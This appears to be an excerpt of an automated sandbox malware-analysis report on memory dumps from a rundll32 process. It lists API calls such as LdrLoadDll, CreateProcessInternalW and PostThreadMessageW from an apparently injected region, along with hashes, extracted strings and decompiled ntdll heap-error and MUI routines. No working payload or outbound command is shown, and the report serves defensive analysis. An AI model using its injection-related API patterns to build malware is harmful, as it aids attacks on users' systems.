                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID: net.dll$wininet.dll
                                                                                            • API String ID: 3472027048-1269752229
                                                                                            • Opcode ID: e4c5fb0c2d3fddc48e076531093d3886df4d9f79e6eb119d767d896a5e528551
                                                                                            • Instruction ID: 1575a7c211ac588c68d600af1e1f37ede3de743f25fff53367042ddd8a5562cc
                                                                                            • Opcode Fuzzy Hash: e4c5fb0c2d3fddc48e076531093d3886df4d9f79e6eb119d767d896a5e528551
                                                                                            • Instruction Fuzzy Hash: 5721A9B6A05205AFD711DFA4C8A0FA7BBB8BF88714F10802DF6196B640E370A445CFE4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 338 25b7629-25b762a 339 25b762c-25b762d 338->339 340 25b75f5-25b75f8 338->340 343 25b762f-25b763f 339->343 344 25b75c4-25b75c5 339->344 341 25b75fa-25b75fc 340->341 342 25b75ae-25b75be call 25ca6a0 340->342 341->338 346 25b7648-25b767a call 25cb300 call 25b9f70 call 25c42d0 343->346 347 25b7643 call 25ca720 343->347 356 25b76ae-25b76b2 346->356 357 25b767c-25b768e PostThreadMessageW 346->357 347->346 358 25b76ad 357->358 359 25b7690-25b76ab call 25b96d0 PostThreadMessageW 357->359 358->356 359->358
                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 025B768A
                                                                                            • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 025B76AB
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID:
                                                                                            • API String ID: 1836367815-0
                                                                                            • Opcode ID: 549859d080381cdb36f758b433ff7c0e1cf544c8cdcfce893e8232daf66e5988
                                                                                            • Instruction ID: 907d4710be561d7c2a7b259a68caff41db4dc75385a6021cd0c9def0a087ca1d
                                                                                            • Opcode Fuzzy Hash: 549859d080381cdb36f758b433ff7c0e1cf544c8cdcfce893e8232daf66e5988
                                                                                            • Instruction Fuzzy Hash: 43110C31A4051D7BD7219994DD02FFDBB18BF84B14F240019FB04AA1C0E79469078BA8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 025B768A
                                                                                            • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 025B76AB
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID:
                                                                                            • API String ID: 1836367815-0
                                                                                            • Opcode ID: 8623d55f06a9257694a48ae33d6b2b74889cdcaa8bb935daf2579ae60fb115c3
                                                                                            • Instruction ID: e4344797182a78780e2e52c31ab65bcf40df6e607789c1dc5c8d3410def90281
                                                                                            • Opcode Fuzzy Hash: 8623d55f06a9257694a48ae33d6b2b74889cdcaa8bb935daf2579ae60fb115c3
                                                                                            • Instruction Fuzzy Hash: 38018831A4022D7AE721AAA4DC42FFE766C6F85B50F140118FB04BA1C0E69469064AE9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 581 25c8ec5-25c8ecc 582 25c8ece-25c8ee9 581->582 583 25c8f11-25c8f3a call 25c9700 581->583 585 25c8eef-25c8f10 582->585 586 25c8eea call 25c9700 582->586 587 25c8f3f-25c8f54 LookupPrivilegeValueW 583->587 586->585
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,025BD3F2,025BD3F2,?,00000000,?,?), ref: 025C8F50
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: bdd69fa690a9345b278c4d75b499c5649785f89297405a4a9d7b8157e93cc0de
                                                                                            • Instruction ID: 862918cb735b27686fb5483023d3c51c2922cfbe7e7768b08147c261e70802c6
                                                                                            • Opcode Fuzzy Hash: bdd69fa690a9345b278c4d75b499c5649785f89297405a4a9d7b8157e93cc0de
                                                                                            • Instruction Fuzzy Hash: 0611E0B5214144AFDB04DF98DC85DE77BA9EF89360F198A5DF88D87202C634E415CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 589 25b9f70-25b9f99 call 25cb550 592 25b9f9b-25b9f9e 589->592 593 25b9f9f-25b9fad call 25cb970 589->593 596 25b9faf-25b9fba call 25cbbf0 593->596 597 25b9fbd-25b9fce call 25c9ca0 593->597 596->597 602 25b9fd0-25b9fe4 LdrLoadDll 597->602 603 25b9fe7-25b9fea 597->603 602->603
                                                                                            APIs
                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 025B9FE2
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Load
                                                                                            • String ID:
                                                                                            • API String ID: 2234796835-0
                                                                                            • Opcode ID: e50510530ad2ae1b1d579bca8e1c56ac484d5ebe242c57014b58d11bb330066c
                                                                                            • Instruction ID: ca41e8ab9f5e52e50ae042ce6eb23a5e874d68c68ce1436de0dbb12477c7c6dd
                                                                                            • Opcode Fuzzy Hash: e50510530ad2ae1b1d579bca8e1c56ac484d5ebe242c57014b58d11bb330066c
                                                                                            • Instruction Fuzzy Hash: 06010CB5D0020EABDF10DAE4DC46FDDB7B9AB44308F104199AA0897241F631EB18CB95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 604 25c8e30-25c8e88 call 25c9700 CreateProcessInternalW
                                                                                            APIs
                                                                                            • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 025C8E84
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateInternalProcess
                                                                                            • String ID:
                                                                                            • API String ID: 2186235152-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,025B8073,?), ref: 025BD88B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,025BD120,?,?), ref: 025C793C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateThread
                                                                                            • String ID:
                                                                                            • API String ID: 2422867632-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,025BD120,?,?), ref: 025C793C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateThread
                                                                                            • String ID:
                                                                                            • API String ID: 2422867632-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,025BD3F2,025BD3F2,?,00000000,?,?), ref: 025C8F50
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 025C8DED
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(025C39B6,?,025C412F,025C412F,?,025C39B6,?,?,?,?,?,00000000,00000005,00000206), ref: 025C8DAD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 025C8DED
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,025B8073,?), ref: 025BD88B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            • The instruction at %p tried to %s , xrefs: 0468B4B6
                                                                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0468B2F3
                                                                                            • The instruction at %p referenced memory at %p., xrefs: 0468B432
                                                                                            • The resource is owned exclusively by thread %p, xrefs: 0468B374
                                                                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0468B2DC
                                                                                            • *** then kb to get the faulting stack, xrefs: 0468B51C
                                                                                            • *** enter .cxr %p for the context, xrefs: 0468B50D
                                                                                            • Go determine why that thread has not released the critical section., xrefs: 0468B3C5
                                                                                            • *** Inpage error in %ws:%s, xrefs: 0468B418
                                                                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0468B476
                                                                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0468B39B
                                                                                            • <unknown>, xrefs: 0468B27E, 0468B2D1, 0468B350, 0468B399, 0468B417, 0468B48E
                                                                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 0468B352
                                                                                            • read from, xrefs: 0468B4AD, 0468B4B2
                                                                                            • write to, xrefs: 0468B4A6
                                                                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0468B38F
                                                                                            • *** An Access Violation occurred in %ws:%s, xrefs: 0468B48F
                                                                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0468B484
                                                                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0468B53F
                                                                                            • The critical section is owned by thread %p., xrefs: 0468B3B9
                                                                                            • a NULL pointer, xrefs: 0468B4E0
                                                                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0468B305
                                                                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0468B47D
                                                                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0468B3D6
                                                                                            • *** enter .exr %p for the exception record, xrefs: 0468B4F1
                                                                                            • The resource is owned shared by %d threads, xrefs: 0468B37E
                                                                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0468B323
                                                                                            • an invalid address, %p, xrefs: 0468B4CF
                                                                                            • This failed because of error %Ix., xrefs: 0468B446
                                                                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0468B314
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • API String ID: 0-108210295
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 44%
                                                                                            			E04691C06() {
                                                                                            				signed int _t27;
                                                                                            				char* _t104;
                                                                                            				char* _t105;
                                                                                            				intOrPtr _t113;
                                                                                            				intOrPtr _t115;
                                                                                            				intOrPtr _t117;
                                                                                            				intOrPtr _t119;
                                                                                            				intOrPtr _t120;
                                                                                            
                                                                                            				_t105 = 0x45b48a4;
                                                                                            				_t104 = "HEAP: ";
                                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                            					_push(_t104);
                                                                                            					E045DB150();
                                                                                            				} else {
                                                                                            					E045DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                            				}
                                                                                            				_push( *0x46c589c);
                                                                                            				E045DB150("Heap error detected at %p (heap handle %p)\n",  *0x46c58a0);
                                                                                            				_t27 =  *0x46c5898; // 0x0
                                                                                            				if(_t27 <= 0xf) {
                                                                                            					switch( *((intOrPtr*)(_t27 * 4 +  &M04691E96))) {
                                                                                            						case 0:
                                                                                            							_t105 = "heap_failure_internal";
                                                                                            							goto L21;
                                                                                            						case 1:
                                                                                            							goto L21;
                                                                                            						case 2:
                                                                                            							goto L21;
                                                                                            						case 3:
                                                                                            							goto L21;
                                                                                            						case 4:
                                                                                            							goto L21;
                                                                                            						case 5:
                                                                                            							goto L21;
                                                                                            						case 6:
                                                                                            							goto L21;
                                                                                            						case 7:
                                                                                            							goto L21;
                                                                                            						case 8:
                                                                                            							goto L21;
                                                                                            						case 9:
                                                                                            							goto L21;
                                                                                            						case 0xa:
                                                                                            							goto L21;
                                                                                            						case 0xb:
                                                                                            							goto L21;
                                                                                            						case 0xc:
                                                                                            							goto L21;
                                                                                            						case 0xd:
                                                                                            							goto L21;
                                                                                            						case 0xe:
                                                                                            							goto L21;
                                                                                            						case 0xf:
                                                                                            							goto L21;
                                                                                            					}
                                                                                            				}
                                                                                            				L21:
                                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                            					_push(_t104);
                                                                                            					E045DB150();
                                                                                            				} else {
                                                                                            					E045DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                            				}
                                                                                            				_push(_t105);
                                                                                            				E045DB150("Error code: %d - %s\n",  *0x46c5898);
                                                                                            				_t113 =  *0x46c58a4; // 0x0
                                                                                            				if(_t113 != 0) {
                                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                            						_push(_t104);
                                                                                            						E045DB150();
                                                                                            					} else {
                                                                                            						E045DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                            					}
                                                                                            					E045DB150("Parameter1: %p\n",  *0x46c58a4);
                                                                                            				}
                                                                                            				_t115 =  *0x46c58a8; // 0x0
                                                                                            				if(_t115 != 0) {
                                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                            						_push(_t104);
                                                                                            						E045DB150();
                                                                                            					} else {
                                                                                            						E045DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                            					}
                                                                                            					E045DB150("Parameter2: %p\n",  *0x46c58a8);
                                                                                            				}
                                                                                            				_t117 =  *0x46c58ac; // 0x0
                                                                                            				if(_t117 != 0) {
                                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                            						_push(_t104);
                                                                                            						E045DB150();
                                                                                            					} else {
                                                                                            						E045DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                            					}
                                                                                            					E045DB150("Parameter3: %p\n",  *0x46c58ac);
                                                                                            				}
                                                                                            				_t119 =  *0x46c58b0; // 0x0
                                                                                            				if(_t119 != 0) {
                                                                                            					L41:
                                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                            						_push(_t104);
                                                                                            						E045DB150();
                                                                                            					} else {
                                                                                            						E045DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                            					}
                                                                                            					_push( *0x46c58b4);
                                                                                            					E045DB150("Last known valid blocks: before - %p, after - %p\n",  *0x46c58b0);
                                                                                            				} else {
                                                                                            					_t120 =  *0x46c58b4; // 0x0
                                                                                            					if(_t120 != 0) {
                                                                                            						goto L41;
                                                                                            					}
                                                                                            				}
                                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                            					_push(_t104);
                                                                                            					E045DB150();
                                                                                            				} else {
                                                                                            					E045DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                            				}
                                                                                            				return E045DB150("Stack trace available at %p\n", 0x46c58c0);
                                                                                            			}












                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                            • API String ID: 0-2897834094
                                                                                            • Opcode ID: 4a0a922afc9f58912a379408513bef0a392816a42cebea19293606d5f22a1aa6
                                                                                            • Instruction ID: b9d9d239a7c0c9544c521736c162999b8948103ae8185259a5927696b6fc867c
                                                                                            • Opcode Fuzzy Hash: 4a0a922afc9f58912a379408513bef0a392816a42cebea19293606d5f22a1aa6
                                                                                            • Instruction Fuzzy Hash: 0361C536651157DFFB119BC8D885A7473E9FB05A31F19802EF40A5B304F6A8BD41EE0A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 96%
                                                                                            			E045E3D34(signed int* __ecx) {
                                                                                            				signed int* _v8;
                                                                                            				char _v12;
                                                                                            				signed int* _v16;
                                                                                            				signed int* _v20;
                                                                                            				char _v24;
                                                                                            				signed int _v28;
                                                                                            				signed int _v32;
                                                                                            				char _v36;
                                                                                            				signed int _v40;
                                                                                            				signed int _v44;
                                                                                            				signed int* _v48;
                                                                                            				signed int* _v52;
                                                                                            				signed int _v56;
                                                                                            				signed int _v60;
                                                                                            				char _v68;
                                                                                            				signed int _t140;
                                                                                            				signed int _t161;
                                                                                            				signed int* _t236;
                                                                                            				signed int* _t242;
                                                                                            				signed int* _t243;
                                                                                            				signed int* _t244;
                                                                                            				signed int* _t245;
                                                                                            				signed int _t255;
                                                                                            				void* _t257;
                                                                                            				signed int _t260;
                                                                                            				void* _t262;
                                                                                            				signed int _t264;
                                                                                            				void* _t267;
                                                                                            				signed int _t275;
                                                                                            				signed int* _t276;
                                                                                            				short* _t277;
                                                                                            				signed int* _t278;
                                                                                            				signed int* _t279;
                                                                                            				signed int* _t280;
                                                                                            				short* _t281;
                                                                                            				signed int* _t282;
                                                                                            				short* _t283;
                                                                                            				signed int* _t284;
                                                                                            				void* _t285;
                                                                                            
                                                                                            				_v60 = _v60 | 0xffffffff;
                                                                                            				_t280 = 0;
                                                                                            				_t242 = __ecx;
                                                                                            				_v52 = __ecx;
                                                                                            				_v8 = 0;
                                                                                            				_v20 = 0;
                                                                                            				_v40 = 0;
                                                                                            				_v28 = 0;
                                                                                            				_v32 = 0;
                                                                                            				_v44 = 0;
                                                                                            				_v56 = 0;
                                                                                            				_t275 = 0;
                                                                                            				_v16 = 0;
                                                                                            				if(__ecx == 0) {
                                                                                            					_t280 = 0xc000000d;
                                                                                            					_t140 = 0;
                                                                                            					L50:
                                                                                            					 *_t242 =  *_t242 | 0x00000800;
                                                                                            					_t242[0x13] = _t140;
                                                                                            					_t242[0x16] = _v40;
                                                                                            					_t242[0x18] = _v28;
                                                                                            					_t242[0x14] = _v32;
                                                                                            					_t242[0x17] = _t275;
                                                                                            					_t242[0x15] = _v44;
                                                                                            					_t242[0x11] = _v56;
                                                                                            					_t242[0x12] = _v60;
                                                                                            					return _t280;
                                                                                            				}
                                                                                            				if(E045E1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                            					_v56 = 1;
                                                                                            					if(_v8 != 0) {
                                                                                            						L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                                            					}
                                                                                            					_v8 = _t280;
                                                                                            				}
                                                                                            				if(E045E1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                            					_v60 =  *_v8;
                                                                                            					L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                                            					_v8 = _t280;
                                                                                            				}
                                                                                            				if(E045E1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                            					L16:
                                                                                            					if(E045E1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                            						L28:
                                                                                            						if(E045E1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                            							L46:
                                                                                            							_t275 = _v16;
                                                                                            							L47:
                                                                                            							_t161 = 0;
                                                                                            							L48:
                                                                                            							if(_v8 != 0) {
                                                                                            								L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                                            							}
                                                                                            							_t140 = _v20;
                                                                                            							if(_t140 != 0) {
                                                                                            								if(_t275 != 0) {
                                                                                            									L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                                            									_t275 = 0;
                                                                                            									_v28 = 0;
                                                                                            									_t140 = _v20;
                                                                                            								}
                                                                                            							}
                                                                                            							goto L50;
                                                                                            						}
                                                                                            						_t167 = _v12;
                                                                                            						_t255 = _v12 + 4;
                                                                                            						_v44 = _t255;
                                                                                            						if(_t255 == 0) {
                                                                                            							_t276 = _t280;
                                                                                            							_v32 = _t280;
                                                                                            						} else {
                                                                                            							_t276 = L045F4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                                            							_t167 = _v12;
                                                                                            							_v32 = _t276;
                                                                                            						}
                                                                                            						if(_t276 == 0) {
                                                                                            							_v44 = _t280;
                                                                                            							_t280 = 0xc0000017;
                                                                                            							goto L46;
                                                                                            						} else {
                                                                                            							E0461F3E0(_t276, _v8, _t167);
                                                                                            							_v48 = _t276;
                                                                                            							_t277 = E04621370(_t276, 0x45b4e90);
                                                                                            							_pop(_t257);
                                                                                            							if(_t277 == 0) {
                                                                                            								L38:
                                                                                            								_t170 = _v48;
                                                                                            								if( *_v48 != 0) {
                                                                                            									E0461BB40(0,  &_v68, _t170);
                                                                                            									if(L045E43C0( &_v68,  &_v24) != 0) {
                                                                                            										_t280 =  &(_t280[0]);
                                                                                            									}
                                                                                            								}
                                                                                            								if(_t280 == 0) {
                                                                                            									_t280 = 0;
                                                                                            									L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                                            									_v44 = 0;
                                                                                            									_v32 = 0;
                                                                                            								} else {
                                                                                            									_t280 = 0;
                                                                                            								}
                                                                                            								_t174 = _v8;
                                                                                            								if(_v8 != 0) {
                                                                                            									L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                                            								}
                                                                                            								_v8 = _t280;
                                                                                            								goto L46;
                                                                                            							}
                                                                                            							_t243 = _v48;
